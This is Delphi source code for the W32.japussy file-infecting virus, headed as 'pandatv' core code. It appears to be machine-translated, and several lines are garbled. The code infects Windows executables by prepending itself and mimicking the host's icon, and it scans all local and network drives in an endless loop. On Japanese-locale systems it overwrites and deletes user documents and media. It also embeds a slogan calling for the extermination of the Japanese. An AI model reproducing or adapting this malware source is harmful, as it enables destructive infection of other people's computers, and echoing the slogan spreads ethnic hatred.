Core pandatv Code Compiled by Li Jun

Program japussy;
Uses
Windows, sysutils, classes, graphics, shellapi {, registry };
Const
Headersize = 82432; // the size of the virus.
Iconoffset = $12eb8; // offset of the primary graph of the PE File

// The size obtained by compiling on my delphi5 SP1. The Delphi of other versions may be different.
// Search for the hexadecimal string of 2800000020 to find the offset of the primary graph.
{
Headersize = 38912; // the size of the virus body compressed by UPX
Iconoffset = $ 92bc; // the offset of the UPX compressed over the main graph of the PE File

// UPX 1.24 W usage: UPX-9 -- 8086 japussy.exe
}
Iconsize = $2e8; // the size of the master image of the PE file, which is 744 bytes.
Icontail = iconoffset + iconsize; // end of the Main chart of the PE File
Id = $44444444; // infection mark

// Spam code for writing
Catchword = 'If a race need to be killed out, it must be Yamato. '+
'If a country need to be destroyed, it must be Japan! '+
'*** W32.japussy. worm. ***';
{$ R *. Res}
Function registerserviceprocess (dwprocessid, dwtype: integer): integer;
Stdcall; External 'kernel32. dll '; // function declaration
VaR
Tmpfile: string;
Si: startupinfo;
Pi: process_information;
Isjap: Boolean = false; // Japanese OS tag
{Judge whether it is Win9x}
Function iswin9x: Boolean;
VaR
Ver: tosversioninfo;
Begin
Result: = false;
Ver. dwosversioninfosize: = sizeof (tosversioninfo );
If not getversionex (VER) then
Exit;
If (ver. dwplatformid = ver_platform_win32_windows) Then // Win9x
Result: = true;
End;
{Copying between streams}
Procedure copystream (SRC: tstream; sstartpos: integer; DST: tstream;
Dstartpos: integer; count: integer );
VaR
Scurpos, dcurpos: integer;
Begin
Scurpos: = SRC. position;
Dcurpos: = DST. position;
SRC. Seek (sstartpos, 0 );
DST. Seek (dstartpos, 0 );
DST. copyfrom (SRC, count );
SRC. Seek (scurpos, 0 );
DST. Seek (dcurpos, 0 );
End;
{Separating the host file from the infected pe file for use}
Procedure extractfile (filename: string );
VaR
Sstream, dstream: tfilestream;
Begin
Try
Sstream: = tfilestream. Create (paramstr (0), fmopenread or fmsharedenynone );
Try
Dstream: = tfilestream. Create (filename, fmcreate );
Try
Sstream. Seek (headersize, 0); // skip the virus section of the header
Dstream. copyfrom (sstream, sstream. Size-headersize );
Finally
Dstream. Free;
End;
Finally
Sstream. Free;
End;
Except
End;
End;
{Fill startupinfo structure}
Procedure fillstartupinfo (VAR Si: startupinfo; State: Word );
Begin
Si. CB: = sizeof (SI );
Si. lpreserved: = nil;
Si. lpdesktop: = nil;
Si. lptitle: = nil;
Si. dwflags: = startf_useshowwindow;
Si. wshowwindow: = State;
Si. cbreserved2: = 0;
Si. lpreserved2: = nil;
End;
{Mail with virus}
Procedure Sendmail;
Begin
// Who is willing to do this?
End;
{Infected pe file}
Procedure infectonefile (filename: string );
VaR
Hdrstream, srcstream: tfilestream;
Icostream, dststream: tmemorystream;
IID: longint;
Aicon: ticon;
Infected, ISPE: Boolean;
I: integer;
Buf: array [0 .. 1] of char;
Begin
Try // if an error occurs, the file is in use and exits.
If comparetext (filename, 'japussy.exe ') = 0 then // if you are yourself, do not infect
Exit;
Infected: = false;
ISPE: = false;
Srcstream: = tfilestream. Create (filename, fmopenread );
Try
For I: = 0 to $108 Do // check the PE File Header
Begin
Srcstream. Seek (I, sofrombeginning );
Srcstream. Read (BUF, 2 );
If (BUF [0] = #80) and (BUF [1] = #69) Then // PE tag
Begin
ISPE: = true; // It is a PE file.
Break;
End;
End;
Srcstream. Seek (-4, sofromend); // check the infection mark
Srcstream. Read (IID, 4 );
If (IID = ID) or (srcstream. Size <10240) Then // files that are too small are not infected
Infected: = true;
Finally
Srcstream. Free;
End;
If infected or (not ISPE) Then // exit if the file is infected or not a PE File
Exit;
Icostream: = tmemorystream. Create;
Dststream: = tmemorystream. Create;
Try
Aicon: = ticon. Create;
Try
// Obtain the master icon of the infected file (744 bytes) and store it to the stream.
Aicon. releasehandle;
Aicon. Handle: = extracticon (hinstance, pchar (filename), 0 );
Aicon. savetostream (icostream );
Finally
Aicon. Free;
End;
Srcstream: = tfilestream. Create (filename, fmopenread );
// Header file
Hdrstream: = tfilestream. Create (paramstr (0), fmopenread or fmsharedenynone );
Try
// Write data before the main icon of the virus.
Copystream (hdrstream, 0, dststream, 0, iconoffset );
// Write the main icon of the current program
Copystream (icostream, 22, dststream, iconoffset, iconsize );
// Write data between the main icon of the virus and the end of the virus.
Copystream (hdrstream, icontail, dststream, icontail, headersize-icontail );
// Write the Host Program
Copystream (srcstream, 0, dststream, headersize, srcstream. size );
// Write the infected mark
Dststream. Seek (0, 2 );
IID: = $44444444;
Dststream. Write (IID, 4 );
Finally
Hdrstream. Free;
End;
Finally
Srcstream. Free;
Icostream. Free;
Dststream. savetofile (filename); // Replace the host file
Dststream. Free;
End;
Except;
End;
End;
{Write the target file to the spam code and delete it}
Procedure smashfile (filename: string );
VaR
Filehandle: integer;
I, size, mass, Max, Len: integer;
Begin
Try
Setfileattributes (pchar (filename), 0); // remove the read-only attribute
Filehandle: = fileopen (filename, fmopenwrite); // open the file
Try
Size: = getfilesize (filehandle, nil); // File Size
I: = 0;
Randomize;
MAX: = random (15); // random number of times the spam code is written
If max <5 then
MAX: = 5;
Mass: = size Div Max; // size of each interval Block
Len: = length (catchword );
While I <Max do
Begin
FileSeek (filehandle, I * mass, 0); // locate
// Write the spam code to completely destroy the file
Filewrite (filehandle, catchword, Len );
INC (I );
End;
Finally
Fileclose (filehandle); // close the file
End;
Deletefile (pchar (filename); // delete it
Except
End;
End;
{Get writable drive list}
Function getdrives: string;
VaR
Disktype: word;
D: Char;
STR: string;
I: integer;
Begin
For I: = 0 to 25 do // print 26 letters
Begin
D: = CHR (I + 65 );
STR: = d + ':/';
Disktype: = getdrivetype (pchar (STR ));
// Obtain the local disk and Network Disk
If (disktype = drive_fixed) or (disktype = drive_remote) then
Result: = Result + D;
End;
End;
{Traverse directories, infect and destroy files}
Procedure loopfiles (path, mask: string );
VaR
I, Count: integer;
FN, ext: string;
Subdir: tstrings;
Searchrec: tsearchrec;
MSG: tmsg;
Function isvaliddir (searchrec: tsearchrec): integer;
Begin
If (searchrec. ATTR <> 16) and (searchrec. Name <> '.') and
(Searchrec. Name <> '..') then
Result: = 0 // not a directory
Else if (searchrec. ATTR = 16) and (searchrec. Name <> '.') and
(Searchrec. Name <> '..') then
Result: = 1 // not the root directory
Else result: = 2; // the root directory.
End;
Begin
If (findfirst (path + mask, faanyfile, searchrec) = 0) then
Begin
Repeat
Peekmessage (MSG, 0, 0, 0, pm_remove); // adjust the message queue to avoid suspicion.
If isvaliddir (searchrec) = 0 then
Begin
FN: = path + searchrec. Name;
Ext: = uppercase (extractfileext (FN ));
If (EXT = '.exe ') or (EXT ='. scr ') then
Begin
Infectonefile (FN); // infect the executable file
End
Else if (EXT = '.htm') or (EXT = '.html ') or (EXT ='. asp ') then
Begin
// Infect HTML and ASP files and write base64-encoded viruses
// Infect all users who browse this page
// Which of the following is willing to do this?
End
Else if ext = '. wab' then // Outlook Address Book File
Begin
// Obtain the Outlook Email Address
End
Else if ext = '. ADC' Then // the Foxmail address automatically completes the file.
Begin
// Obtain the Foxmail email address
End
Else if ext = 'ind 'then // Foxmail Address Book File
Begin
// Obtain the Foxmail email address
End
Else
Begin
If isjap then // the operating system of the plain text
Begin
If (EXT = '.doc ') or (EXT = '.xls') or (EXT = '. mdb') or
(EXT = 'hangzhou') or (EXT = '. M') or (EXT ='. A') or
(EXT = '.wma ') or (EXT = '.zip') or (EXT = '.rar ') or
(EXT = '. MpEG') or (EXT = '. asf') or (EXT = '.jpg') or
(EXT = '.jpeg ') or (EXT = '.gif') or (EXT = '.swf ') or
(EXT = 'users') or (EXT = '. chm') or (EXT ='. avi') then
Smashfile (FN); // destroy the file
End;
End;
End;
// After a file is infected or deleted, it sleeps for 200 milliseconds to avoid suspicion of high CPU usage.
Sleep (200 );
Until (findnext (searchrec) <> 0 );
End;
Findclose (searchrec );
Subdir: = tstringlist. Create;
If (findfirst (path + '*. *', fadirectory, searchrec) = 0) then
Begin
Repeat
If isvaliddir (searchrec) = 1 then
Subdir. Add (searchrec. Name );
Until (findnext (searchrec) <> 0 );
End;
Findclose (searchrec );
Count: = subdir. Count-1;
For I: = 0 to count do
Loopfiles (path + subdir. Strings + '/', mask );
Freeandnil (subdir );
End;
{Traverse all files on the disk}
Procedure infectfiles;
VaR
Driverlist: string;
I, Len: integer;
Begin
If getacp = 932 then // Japanese Operating System
Isjap: = true; // Let's die!
Driverlist: = getdrives; // obtain the writable disk list.
Len: = length (driverlist );
While true do // Infinite Loop
Begin
For I: = Len downto 1 do // traverse each disk drive
Loopfiles (driverlist + ':/', '*. *'); // infected
Sendmail; // send a mail with a virus
Sleep (1000*60*5); // sleep for 5 minutes
End;
End;
{Main program start}
Begin
If iswin9x then // is Win9x
Registerserviceprocess (getcurrentprocessid, 1) // register as a service process
Else // winnt
Begin
// Remote thread ing to explorer process
// Which station is willing to complete?
End;
// If it is the original virus
If comparetext (extractfilename (paramstr (0), 'japussy.exe ') = 0 then
Infectfiles // infect and send emails
Else // has been parasitic on the host Program and started to work
Begin
Tmpfile: = paramstr (0); // create a temporary file
Delete (tmpfile, length (tmpfile)-4, 4 );
Tmpfile: = tmpfile + #32 + '.exe '; // real host file with one more space
Extractfile (tmpfile); // separated
Fillstartupinfo (Si, sw_showdefault );
CreateProcess (pchar (tmpfile), pchar (tmpfile), nil, nil, true,
0, nil, '.', Si, Pi); // create a new process to run
Infectfiles; // infect and send emails
End;
End.